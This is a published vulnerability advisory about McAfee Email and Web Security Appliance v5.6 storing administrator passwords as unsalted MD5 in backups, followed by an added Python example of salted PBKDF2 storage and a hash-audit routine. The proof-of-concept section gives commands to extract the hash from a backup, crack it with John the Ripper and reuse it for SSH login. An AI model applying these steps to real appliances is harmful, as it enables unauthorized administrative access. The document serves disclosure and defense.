Summary
Name: McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
Release Date: 30 November 2012
Reference: NGS00157
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 25 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012
Description
McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) stores
passwords weakly: administrator password hashes can be recovered from a
system backup and easily cracked.
The exploit would enable an attacker to:
– Having gained access to the UI, recover and crack administrator password
hashes
– Having cracked the SuperAdministrator password, enable SSH and log in to
the appliance operating system
Technical Details
I. VULNERABILITY
McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
II. BACKGROUND
McAfee (owned by Intel) is one of the world's best-known providers of IT
security products.
The McAfee Email and Web Security Appliance provides security for email and
web protocols, and acts as a firewall and gateway solution.
III. DESCRIPTION
McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
IV. PROOF OF CONCEPT
Password hashes can be recovered from a system backup and easily cracked
(they are not salted and are stored as simple MD5 hashes, so a simple
Google search may be enough to find the password).
System > Cluster Management > Backup and Restore Configuration > Backup
Configuration > Backup the product
Unpack the zip file
unzip config_20111106152627.zip
Grep for passwords in "/proto/wsadmin/users.xml"
grep password proto/wsadmin/users.xml
md5sum ->
role="super" usekdc="0" kdc="" log-session="1" sa_admin="1"
password="5a731a984ad01873cafab2ba10449b9a" vhost=""/>
If the password cannot be found by searching Google (unlikely), then John
the Ripper can be used as follows:
john --format=raw-MD5 mcafee.txt
Loaded 1 password hash (Raw MD5 [raw-md5 64×1])
admin2 (?)
guesses: 1 time: 0:00:00:00 100.00% (2) (ETA: Mon Nov 7 13:10:15 2011)
c/s: 876800 trying: rabbit2 – altamira2
This password is also the same as the password for the "support" user for
SSH logins.
To enable SSH:
System > Appliance Management > Remote Access > Enable the secure shell
(then save policy)
Fix Information
Password hashes should be stored in a secure format such as salted SHA-512.
Verification should be required before a system backup can be taken.
Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, or McAfee Email Gateway 7.0 Patch 1.
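The following is an added illustration of the fix recommended above and is not code from the advisory or from McAfee. It contrasts the weak scheme the advisory describes (one unsalted round of MD5, so identical passwords always produce identical hashes that a precomputed table resolves instantly) with salted, iterated PBKDF2-HMAC-SHA512 storage and constant-time verification, and it includes a small audit routine a defender can run over an exported users.xml to flag accounts still carrying a legacy-format hash. The `<user>` element name, the `name` attribute, the sample XML document and the iteration count are assumptions; the advisory only shows the `password`, `role` and `sa_admin` attributes.

```python
"""Added example (not from the advisory): unsalted MD5 vs. salted PBKDF2-HMAC-SHA512,
plus an audit of a users.xml export for legacy-format hashes."""
import hashlib
import hmac
import os
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# Assumption: a plain 32-hex-digit attribute value is an unsalted MD5 digest.
LEGACY_MD5_RE = re.compile(r"^[0-9a-f]{32}$")
# Assumption: work factor chosen for illustration; tune it for the target hardware.
PBKDF2_ITERATIONS = 200_000


def legacy_md5_hash(password: str) -> str:
    """The weak scheme from the advisory: one round of MD5, no salt.
    Deterministic, so two users with the same password share a hash and a
    precomputed lookup defeats it without any brute force."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash. A fresh random salt per user means identical
    passwords no longer produce identical records, and the iteration count
    makes each guess expensive. Format: scheme$iterations$salt_hex$dk_hex."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha512${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count and compare in
    constant time; any malformed or non-PBKDF2 record fails closed."""
    try:
        scheme, iterations, salt_hex, dk_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        rounds = int(iterations)
    except ValueError:
        return False
    if scheme != "pbkdf2_sha512" or rounds < 1:
        return False
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, expected)


def is_legacy_hash(stored: str) -> bool:
    """True when the stored value looks like an unsalted MD5 digest."""
    return bool(LEGACY_MD5_RE.match(stored))


def audit_users_xml(xml_text: str) -> List[str]:
    """Return the names of accounts whose password attribute is a legacy
    MD5 digest, so a backup can be checked before it is stored or shipped."""
    root = ET.fromstring(xml_text)
    return [el.get("name", "?") for el in root.iter("user")
            if is_legacy_hash(el.get("password", ""))]


# Constructed sample export (not a real appliance backup): one account still on
# the legacy scheme, one already migrated. Element and attribute names are assumed.
SAMPLE_USERS_XML = f"""<?xml version="1.0"?>
<users>
  <user name="admin" role="super" sa_admin="1" password="{legacy_md5_hash('password')}"/>
  <user name="auditor" role="read" sa_admin="0" password="{hash_password('correct horse')}"/>
</users>
"""

if __name__ == "__main__":
    print("legacy MD5 is deterministic:",
          legacy_md5_hash("password") == legacy_md5_hash("password"))
    print("salted records differ per user:",
          hash_password("password") != hash_password("password"))
    print("accounts still on unsalted MD5:", audit_users_xml(SAMPLE_USERS_XML))
```

Running the module prints `['admin']` for the audit, showing the kind of check that would have flagged the backup described above before it left the appliance. The migration path for flagged accounts is to re-hash on the user's next successful login, since the original password is not recoverable from the stored record.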